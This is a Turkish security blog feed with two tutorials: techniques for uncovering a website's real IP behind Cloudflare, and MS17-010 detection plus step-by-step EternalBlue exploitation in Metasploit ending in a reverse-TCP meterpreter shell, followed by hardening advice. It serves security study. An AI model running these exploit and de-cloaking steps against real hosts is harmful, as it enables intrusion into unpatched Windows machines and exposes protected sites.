Cihan Mehmet Doğan, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Fri, 13 Oct 2017 15:28:30 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png Cihan Mehmet Doğan, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | CloudFlare Bypass Yöntemleri https://canyoupwn.me/tr-cloudflare-bypass-yontemleri/ https://canyoupwn.me/tr-cloudflare-bypass-yontemleri/#comments Thu, 12 Oct 2017 11:21:01 +0000 https://canyoupwn.me/?p=7291 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

CloudFlare Nedir Cloudlare sitenizi güvenlik açısından ileri seviye bir güçlendirmeye alan ücretli ve ücretsiz proxy hizmetlerini kurumsallaştırıp sunan sistemdir. Cloudflare bir içerik dağıtım ağı servisidir yani sitenizin verilerini dünya çapında dağıtılmış sunucularda saklar ve sitelerin ip adreslerini saklar. Her türlü yazılım ile yazılan sisteminize entegre edebileceğiniz bu sistemi bugün ismi duyulmuş çoğu site kullanmaktadır. Aynı zamanda sizin trafik dostunuz olan […]

TR | CloudFlare Bypass Yöntemleri Cihan Mehmet Doğan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

CloudFlare Nedir

Cloudlare sitenizi güvenlik açısından ileri seviye bir güçlendirmeye alan ücretli ve ücretsiz proxy hizmetlerini kurumsallaştırıp sunan sistemdir. Cloudflare bir içerik dağıtım ağı servisidir yani sitenizin verilerini dünya çapında dağıtılmış sunucularda saklar ve sitelerin ip adreslerini saklar. Her türlü yazılım ile yazılan sisteminize entegre edebileceğiniz bu sistemi bugün ismi duyulmuş çoğu site kullanmaktadır. Aynı zamanda sizin trafik dostunuz olan bu site önbellek (cache) tutarak daha az sorgu yapılmasını, dosya indirilmesini sağlar ve böylece trafiğiniz azalmış olur.

Örneğin web siteniz Fransa lokasyonlu bir sunucumuzda barındırılıyor ama ziyaretçileriniz Türkiye’den giriyor olsun. Cloudflre Türkiye’de bulunan ya da en yakın Cloudflare sunuculardan yayın yapacak  ve  bu hizmet sayesinde sitenizin daha hızlı(ücretli versiyonlarında) ve stabil açılmasını sağlayacaktır.

Cloudflare ücretli paketlerinde ddos,sql injection,  xss,  spam gibi saldırılardan koruyan web firewall özellikleri bulunmaktadır. Bu hizmeti sunan sadece Cloudlare hizmeti yoktur. Japon menşeili firma olan Akamai’de bu alanda başarılıdır.

CloudFlare Kullanıldığını Öğrenme

Cloudflare arkasındaki sitenin ip adresini bulma için bir kaç yöntem deneyeceğiz. Bu yöntemlerde www.esintitaki.com sitesini kullanacağız. Benim yapmış olduğum bir sitedir ve böylelikle hiçbir suç teşkil etmeyecek. Site şuan tam olarak tamamlanmadı ve kullanımda değil.

Siteye bir ping paketi göndererek ip adresini öğrenelim.

 

Cloudflare İp Listesinden ip adres aralıklarına bakabilirsiniz.

Bir sitenin cloudflare hizmetini kullanıp kullanmadığını anlamanın birçok yöntemi vardır. Ben Wappalyzer eklentisini kullacağım. Wappalyzer Chrome ,Opera ve Mozilla üzerine kurulan bir eklentidir. Bir siteye ait kullanılan tüm yazılım dilleri ve kullanılan javascript kütüphaneleri hakkında bilgi verir. Alternatifi olarak https://builtwith.com sitesi üzerinden hedef siteyle ilgili ayrıntılı bilgiye ulaşabilirsiniz. Aşağıda wappalzer eklentisinin basit bir görünümü bulunmaktadır.

İkinci bir yöntem olarak kullandığım diğer eklenti olan Shodan . Bu eklenti site ip adresi, ip adres konumunu, sitedeki açık portları ve  kullanılan hosting firmasını gösterir.

 

CloudFlare Bypass Etme Yöntemleri

Aşağıda Cloudflare bybass etme yöntemleri gösterilecektir. Burada anlatılan yöntemler tüm sitelerde  yüzde yüz kesin sonuç vermeyebilir. Her sitenin konfigürasyonu farklı olabilir. Biz burada eksik yapılan konfigürasyon eksikleri sayesinde sitenin gerçek ip adresine ulaşacağız. Burada önemli olan gösterilecek  yöntemlerin sadece birisi yerine bir kaç tanesi denendikten sonra aynı sonucun ortaya çıkmasıdır.

1)PİNG

Sitemiz ip adresini bulmak için  ICMP protokolünü kullanarak ping göndereceğiz. Site dns adresine ping gönderildiğinde cloudflare’e kayıtlı olan ip adresini görmüş oluruz. Aşağıdaki subdomainler hosting firmaları tarafından oluşturulur. İlk başta ana siteye ping atarak site ip adresi öğrenilir, daha sonra diğer subdomanlere de gönderilerek ana siteden farklı ip adreslerini bulmaya çalışırız. Bulunan bu farklı ip adresi sitenin gerçek ip adresi olur.

ping esintitaki.com

ping cpanel.esintitaki.com

ping ftp.esintitaki.com

ping webdisk.esintitaki.com

ping webmail.esintitaki.com

ping whm.esintitaki.com

ping mail.esintitaki.com

ping direct.esintitaki.com

ping direct-connect.esintitaki.com

2)NMAP

Birinci yöntemde yaptıklarımızı nmap aracı ile yapabiliriz.Asağıdaki kod verilen dns üzerindeki tüm altalan adlarını(subdomain) kaba kuvvet yöntemi ile tarayıp bulur daha sonra ip adreslerini verir.

nmap --script dns-brute -sn esintitaki.com

nmap -sV -sS -F esintitaki.com

3)DNSENUM

Dnsenum aracıda sitenin nameserver, mail server’ın dns adrelerini ve bunların ip adreslerini bulur.

 dnsenum esintitaki.com

 

4)DNSMAP

Dnsmap aracı ile tüm dns haritasını ve ip adreslerini ortaya çıkararır.

dnsmap esintitaki.com

5)NSLOOKUP

 

Nslookup aracı ile mx sorgusu ile mail sucususunun subdomainini bulduktan sonra bu adrese ping sorgusu ile sitenin gerçek ip adresine ulaşılabilir.

nslookup  -q=mx esintitaki.com

ping dc-49e264d0.esintitaki.com

6)Netcraft

Siteyi oluşturan tarafın site oluşturulduktan sonra hemen clouldflare ile ipadresini gizlemeyebilir. Bu yüzden eski DNS ve İp kayıtlarına bakarak bulabiliriz.

Netcraft ile siteyi taradığımızda site ile ilgili site  açılma tarihi, nameserver ve hosting geçmişi gibi bir çok bilgi yer alıyor. Aşağıdaki resimde de görüldüğü gibi yazilimodasi.com ip adresi tespit edildi.Her sitenin bu şekilde gözükmeyebilir ben siteyi clouldflare’a yeni taşıdığım için gözükebilir.

 

8)Viewdns.info

Viewdns.info sitesi verilen dns adresinin  domain ve hosting geçmişine ait firmaların isimleri ve ip adreslerini verir. Buradan sitenin cloudflare’den bir önceki ip adresi sitenin kendi ip adresidir.

Bir ara bende yazilimodsi.com sitesini Cloudflare geçirmiştim. Sonra sitede yavaşlamalar yaşanmaya başladığı için sonradan geri eski haline dödürdüm.Buradan şu sonuç çıkıyor güvenlik ve sitenin hızı ters orantılıdır. Artık ikisinden birini seçmek zorundasın.

 

9) Dnsdumpster

https://dnsdumpster.com/

9)CrimeFlare

CrimeFlare, PIR(Public Information Research) tarafından kurulmuş, CloudFlare’ın suça teşvik edici bir yapı olduğunu ve zararları olduğunu düşünen bir sitedir.

Bu adresten sitenin arama kutusuna ulaşıp, gerçek ip adreslerini görmek istediğiniz siteyi aratarak sonuca ulaşabilirsiniz. Sitede an itibariyle 1.1 milyondan fazla kayıt olduğu söyleniyor. Ayrıca isterseniz sitedeki veritabanını bilgisayarınıza indirip inceleyebilirsiniz.

 

10)İnternetten Online CloudFlare Bypass Yapan Siteler

Aşağıdaki siteler cloudflare ip gizleme işlemlerini bypass eden  online siteler aşağıdaki gibidir.

https://cloudresolve.net/

http://dnstree.com

http://skypegrab.net/cf.php

11)Websploit

WebSploit aracı clouldfire bypass yöntemlerinden en bilindik yöntemidir.Websploit ile man in the middle (araya girme) saldırısında kullanılan içerinde birçok modül bulunmaktadır.Kali,Parrot, Black Arck, Back Box gibi işletim sitemlerinde kuurlu gelir.Terminale websploit yazılarak araç başlatır.

show modules komutu ile içinde barındırdığı saldırı türlerini görebiliriz. Web,network,exploit,wireless alanlarında ait saldırı türlerini vardır. use komutu ile işlem yapacağımız saldırı türünü seçiyoruz. set target komutu ile hedef site adresini belirlenir.İşlemi başlatmak için run komutu kullanılır

websploit

use web/cloudflare_resolver

set target esintitaki.com

run

 

12)Resim Yöntemi
Yapılacağımız kısaca ip öadresini öğrenek istediğimiz siteye üye olup kullanıcı profilinden profil fotoğrafını ya da avatarımı değiştirerek siteye yüklediğimiz resim dosyasını izleyerek sitenin kendi ip adresine ulaşacağız.
http://iplogger.org/main/img/ adresindeki yere buradaki gibi alınan resim yükleyin.Resmi yükledikten sonra aşadıdaki gibi bir ekranla karşılaşacaksınız.

Üstteki resimde en alttan yüklediğimiz dosyanın türününü istediğiniz gibi değiştirebilirsiniz.Ben png olarak değiştirdim.Deneme yapacağımız  http://www.esintitaki.com/ sitesi kullanıcı profilinden profil resmini değiştirme ekranına geliyoruz ve iplogger sitesinden yeni oluşturduğumuz resmin linkini avatar yerine yapıştırıyoruz.

Aynı şekilde forum sitelerinde de yapabilirsiniz.Avatarımı değiştir dediğinizde anasiteden iplogger’a istek gideceği için ip adresini buluruz.

İp adresleri aşağıdaki gibi gözükecektir.Denediğim forum sitesi büyük bir site olduğu için gerçek ip adresini gizlemek zorunda kaldım ama yöntem işe yarıyor.Aynı yöntemi siteye yorum olarak yaparakta ip adresine ulaşabiliriz.

13)Betikle Cloudflare Bypass Etme 

a)Nslookup aracı ile yapmış olduğum basit iki script.Sitenin dns adresinin ip adresini ve bulunduğu hosting firmasının adını gösterir.

Scriplerin kaynak kodları ve kullanımı ağaşıdaki linkten ulaşabilirsiniz

https://github.com/cihanmehmet/cloudflarebypass/

cloudflare bypass etmek için kullanılan iki ayrı script bulunmaktadır.

git clone https://github.com/cihanmehmet/cloudflarebypass.git

cd cloudflarebypass

İlk başta scriptlerimizi çalıştırabilmemiz için  yazma izni vermeliyiz

sudo chmod +x dnsresolver.sh

sudo chmod +x  cloulflarebypass.py

Betikleri çalıştırmak için;

python cloulflarebypass.py

./cloulflarebypass.py

bash dnsresolver.sh

./dnsresolver.sh

b)Ruby ile yazılmış olan gerçek ip adresini bulmak için yazılmış başarılı bir araç.

git clone https://github.com/HatBashBR/HatCloud.git

cd HatCloud

sudo chmod +x hatcloud.rb

Kullanımı

ruby hatcloud.rb -b targetsite.com

ruby hatcloud.rb --byp targetsite.com

14)CloudFail

CloudFail, sunucunun yerini keşfetme umuduyla CloudFlare tarafından korunan bir hedef hakkında yeterli bilgiyi toplamayı amaçlayan taktik bir keşif aracıdır. Tor’un tüm istekleri maskelemek için kullandığı araç şu an itibariyle 3 farklı saldırı evresine sahip.

a)DNSDumpster.com sitesini kullanarak yanlış yapılandırılmış DNS taraması.

b)Crimeflare.com veritabanını taraması

c)Bruteforce 2500’den fazla alt alan taramalısı.

Kurulumu

Bu aracın çalışması için gerekli python3 kütüphaneleri

pip3 install argparse colorama socket binascii datetime requests

git clone https://github.com/m0rtem/CloudFail.git

Kullanımı

a)Normal kullanımı

python cloudfail.py --target targeturl.com

b)Tor kullanarak bir hedefe karşı tarama yapmak için:

service tor start

python cloudfail.py --target esintitaki.com --tor

15)Sosyal Mühendislik

Diğer bir yöntem olarak siteye domanini  üzerinden bize mail  gelmesine sağlayarak mailin geldiği yer kontrol ederek site ip adresine ulaşılabilir.Bunun için karşı tarafın size mail adresi göndermesi için sosyal mühendislik yöntemleri kullanmalısınız.

 

TR | CloudFlare Bypass Yöntemleri Cihan Mehmet Doğan

]]>
https://canyoupwn.me/tr-cloudflare-bypass-yontemleri/feed/ 1
TR | MS17-010 Zafiyeti ve Korunma Yöntemleri https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/ https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/#comments Sat, 22 Jul 2017 14:47:38 +0000 https://canyoupwn.me/?p=7071 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shadow Brokers ekibi tarafından NSA’ye ait Windows Hacking araçları bir kaç ay önce sızdırıldı. Windows bilgisayarları kolayca istismar etmek için NSA tarafından yazılan/kullanılan araçlar adete bir cephanelik gibi içerisinde çok önemli araçlar bulunmaktadır.Eternalblue & Doublepulsar olarak adlandırılan kısaca smb üzerinden dll injection yaparak hedefe sızmayı sağlıyor.Hatta EternalBlue zafiyetinden yararlanarak WannaCry ve Petya zararlı yazılımları dünyada […]

TR | MS17-010 Zafiyeti ve Korunma Yöntemleri Cihan Mehmet Doğan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shadow Brokers ekibi tarafından NSA’ye ait Windows Hacking araçları bir kaç ay önce sızdırıldı. Windows bilgisayarları kolayca istismar etmek için NSA tarafından yazılan/kullanılan araçlar adete bir cephanelik gibi içerisinde çok önemli araçlar bulunmaktadır.Eternalblue & Doublepulsar olarak adlandırılan kısaca smb üzerinden dll injection yaparak hedefe sızmayı sağlıyor.Hatta EternalBlue zafiyetinden yararlanarak WannaCry ve Petya zararlı yazılımları dünyada birçok sistemi olumsuz etkilemiştir.

Araçlara aşağıdaki linkten ulaşabilirsiniz

https://github.com/misterch0c/shadowbroker

Tenable Network Security ekibi yaptığı açılamada.
Sızdırılan veriler arasında birçok exploit ve zero-day açıkları bulunuyor. Hatta bazı exploitler seçili Windows sistemleri üzerinde ‘God Mode’ özelliği bile sunuyor. Hedeflenen ürünler arasında Lotus Notes, Lotus Domino, IIS, SMB, Windows XP, Windows 8, Windows Server 2003 ve Windows Server 2012 bulunuyor.

Yayınlanan araçlardan en çok dikkat çekeni Windows’taki CVE-2017-010 SMB güvenlik açığını inceleyeceğiz.Shodow Brokers bu belgeleri 14 Nisanda açıklamıştı.Windows Mart ayında bu zafiyetin yamasını daha önceden yayınlamıştı.Yamanın yayınlanmasına rağmen güncelleme yapmayan bilgisayarlar için potansiyel olarak hala tehlike halindedir.Bu zafiyetin kullanılabilmesi için 445 smb portunun açık olması gerekmektedir.

CVE-2017-010 SMB zafiyeti Windows XP işletim sistemlerde görülen MS08-067(exploits/windows/smb/ms08_067_netapi) zafiyetini de akıllara getirdi ve daha fazla sistem etkilenmiş durumdadır.Aşağıda etkilenen sistemler listesi gözükmektedir.

Windows Server 2003 SP0 (x86)
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows 7 (all services pack) (x86) (x64)
Windows Server 2008 R2 (x86) (x64)

Kontrol Yöntemleri

1)Python Script

Hedef makinada bu açıklığın olup olmadığını anlamak için aşağıdaki python scripti bu kontolü yapılabilmektedir. Kullanımı çok basitir.

Betiği indirelim.

wget https://raw.githubusercontent.com/nixawk/labs/master/MS17_010/smb_exploit.py

Python scripti çalıştırmak için argüman olarak taranmak istenen ip adresi yazılmalıdır.Tarama sonucunda hedef sistemde bu zafiyet varsa “is likely VULNERABLE to MS17-010!” yazısı çıkmaktadır eğer zafiyet bulunmuyorsa does “NOT appear vulnerable” yazısı çıkacaktır.

python smb_exploit.py 192.168.2.146

Taranan ip’de zafiyet olduğu gözükmektedir.

2)Metasploit Auxiliary

Metasploit ile yapacağımız taramalarda daha önce tespit ettiğimiz hedef IP adreslerini kullanacağız
CVE-2017-010 zafiyetinin bir makinada olup olmadığını anlamak için metasploit’te hazır bulunan smb_ms17_010 auxiliary’ini kullanırız.

msfconsole
msf> use auxiliary/scanner/smb/smb_ms17_010

Metasploit’te smb_ms17_010 auxiliary’e hedef ip’yi verdikten sonra bize CVE-2017-010 zafiyeti bulunup bulunmadığını söyleyecek.

msf>set rhosts 192.168.2.144

set rhosts komutundan sonra istenirse ip’lerin arasına boşluk konularak daha fazla ip taraması yapılabilmektedir.

msf>set rhosts 192.168.2.144 192.168.2.146 10.15.124

[!] 192.168.2.144:445 – Host is likely VULNERABLE to MS17-010! —>Makinada zafiyet MS17-010 zafiyeti var.

3)Nmap Scripts

Hedef sistemde bu açıklığın olup olmadığını anlamanın diğer bir yöntemi ise nmap aracıdır.MS017-01 exploitnin kontrolü için yazılan betik nmap scrips klasörü altına atıldıktan sonra kullanıma hazır olacaktır.Script’,in nmap script klasörü içerisine eklenmesi gerekmektedir.

cd /usr/share/nmap/scripts

wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

Bu açıkık smb 445 portundan kaynaklandığı için aşağıdaki nmap komutu ile kontol sağlanmış olur.

nmap -p445 --script smb-vuln-ms17-010 192.168.1.42

Tarama sonucunda ms17-010 açıklığının olduğu anlaşılmış oldu.

4)Online Tarama

Eğer internete açık Windows sunucularınızda MS17-010 zafiyetinin olup olmadığını http://ms17-10.com üzerinden de online olarak ücretsiz bir şekilde test edebilirsiniz.

Exploit Etme İşlemleri

1)Metasploite Exploit Ekleme

Metasploit kullanarak meterpreter için aşağıdaki linkeki dosyaları eklemeliyiz.

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Exploit windows’a ait dll dosyaları içierdiği için wine32’nin kurulu olması gerekmektedir.

Kullandığınız işletim sisteminiz 64 bit ise aşağıdaki komut ile wine32 kurulmalıdır.

dpkg --add-architecture i386 && apt-get update && apt upgrade -y && apt autoremove

apt-get install wine32

Kurulum bittikten sonra wine programının tam olarak çalıştığından emin olmak için küçük herhangi bir exe dosyası çalıştırmayı deneyiniz.

Örnek olarak cmd.exe yi çalıştırabilirsiniz

wine cmd.exe
exit

Exploit için ilk önce metasploit’in veritabanı olarak kullandığı postgresql servisi başlatılmalıdır.

service postgresql start

Metasploit dizindeki Windows smb exploitlerinin bulunduğu dizine terminalden gelinir.

cd /usr/share/metasploit-framework/modules/exploits/windows/smb/

Exploit belirtilen dosya içine indirilir.

wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

İndirilen exploit’in metasploit tarafından algılayabilmesi için postgresql servisi yeniden başlatılır.

service postgresql restart

Terminalden yeni bir sekme açalım ve ana dizine gidelim ve exploitimizin çalışması için gerekli olan dosyaları indirelim.Gerekli dosyaların bulunduğu dizinen gidelim ve dosya yolunu kaydedelim.

cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit/
cd deps/
pwd

Dosya yolunu indirdiğimiz exploitin içine eklemeliyiz.Exploit’i açalım.

nano /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb

TARGETARCHITECTURE ve ETERNALBLUEPATH’a /root/Eternalblue-Doublepulsar-Metasploit/deps dizinini ekleyelim.

Böylece her exploiti kullanmak istediğimizde kütüphanelerin bulunduğu dizini her seferinde yazmak zorunda kalmayız.
ssss

Metasploit açtıktan sonra “eternalblue_doublepulsar” exploitimizi açalım.Exploit edilecek hedef ip yazılır(rhost) daha sonra hedef işletim sistemine göre target(set target 8) belirlenir.info komutu ile exploitin desteklediği işletim sistemleri belirlenebilir.Hedef işletim sisteminin mimarisi belirlenir(32 mi 64 bit mi).Exploit edilme işlemi sonrasında hedef sisteme sızmak ve istenilen işlemleri gerçekleştirmek için payload belirlenmelidir(set payload).Sardırgan ip adresi(lhost) sisteme girilir ve exploit işlemi başlatıtır(run ya da exploit).

msfconsole
msf>use exploit/windows/smb/eternalblue_doublepulsar
msf>show options
msf>set rhost 192.168.2.144
msf>set target 8
msf>set targetarchitecture x64
msf>set payload windows/x64/meterpreter/reverse_tcp
msf>set lhost 192.168.2.128
msf>run
 Biz Windows 7 64 bit kurulu güvenlik duvarı açık bir bilgisayara meterpreter bağlantısı yapmayı başardık.Eğer
Windows XP sp3 içinse sadece bir argümanı değiştirdiğimizde yine meterpreter ekranına düşebiliriz.
Meterpreter’e background yazıp Windows 7 meterpreter oturumu arka plana alınır.Windows Xp sistemin ip adresi yazıldıktan sonra set target 0 komutu ile Xp seçilir ve run komutu ile exploit başlatıldığında aynı şekilde yeni bir meterpreter oturumu oluşur.

2)Hazır Metasploit Exploiti

Metasploit’e bu açıklık çıktıktan hemen sonra eklenen ms17_010_eternalblue exploit’i birinci yöntemde exploit etmektedir.Fakat bu exploit sadece Windows 7 ve Server 2008 R2 (x64) sistemlerde çalışmaktadır.
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.69.146
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.69.138
run
 
 

 

Wannacry Virüsü

Wannacry virüsü Mayıs ayında dünya çapında birçok ülkeyi etkileyen büyük çapta bir fidye yazılım saldırısı gerçekleştirilmiştir. Wannacry fidye virüsü hedeflerini mail atma phishing gibi sosyal mühendislik yöntemleri yerine hiçbir kullanıcı etkileşimine gerek kalmadan Microsoft Windows’un SMBv1 sisteminde bulunan MS17-010 kapsamında tanımlanıp güncelleme yapılmamış bilgisayarlardaki güvenlik açığından faydalanarak bulaşmaktadır.Türkiye wannacry virüsünden pek etkilenmese de Rusya ve İngiltere’ninde içinde bulunduğu 74 ülke etkilenmiştir.

Petya Fidye Yazılımı

Petra  sırasıyla Ukrayna, Danimarka, İspanya ve Fransa’da görülmeye başlandı.Bulaştığı yerlerden şirketleri etkileyerek 300 dolarlık fidye talep etmektedir.Petya yazılımı ransomware’in bu yeni gelişmiş bir versiyonu olacak düşünülebilir.Geçen aylarda sadece 72 saatte 300.000 sistem ve sunucuya bulaştığı gözlemlenmiş ve tıpkı WannaCry gibi Windows SMBv1 güvenlik açığı (MS17-010) sayesinde hızla yaygınlık göstermiş ve bulaşmasıda kolay olmuştur.

Petra SMBv1 güvenlik açığının dışında spam e-postalar ile sisteme enfekte olmaktadır. Bilgisayar kullanıcılarına CVE-2017-0199 zafiyeti üzerinden sosyal mühendislik yömtemleriyle e-postalar yoluyla bulaştırılmaktadır.

Wannacry ve Petya’dan Korunma Yöntemi

Kullanılmakta olan Windows işletim sisteminin güncelleştirmeleri  düzenli olarak yapılmalıdır.Lisanslı, güncel antivirüs ve bilenen antivirüs yazılımı kullanılmalıdır.Antivirüsler kendi otomatik güncellemeleri dışında elle güncelleme yapılarak ,virüs imzaları sürekli güncel olmalıdır.445 portunu kullananSMBv1 protokolü kullanılmıyorsa kapatılmalıdır.Önemli verilerinizin tutulduğu sistemlerin düzenli olarak son  yedeklerini kontrol edilerek yedeklemeler otomatize bir şekilde yapılmalı.Alınan yedekler farklı bir sunucuda tutulmalıdır.Özellikle dışarıya açık UDP port 137 ve 138, TCP port 139 ve 445’i kapatılması gerekmektedir.Petrada görülen perfc.dat dosyası diğer sistemlere mail yoluyla gönderiliyor ve kuruluyor bunu önlemek için  PSexec’in çalıştırılmasını antivirüsler yoluyla engelleyin.Şirket çalışanları tarafından virüsün tüm sisteme yayılmasını önlemek için gerekiyorsa kullanıcılara dosyalara okuma izni verilmelidir.

TR | MS17-010 Zafiyeti ve Korunma Yöntemleri Cihan Mehmet Doğan

]]>
https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/feed/ 1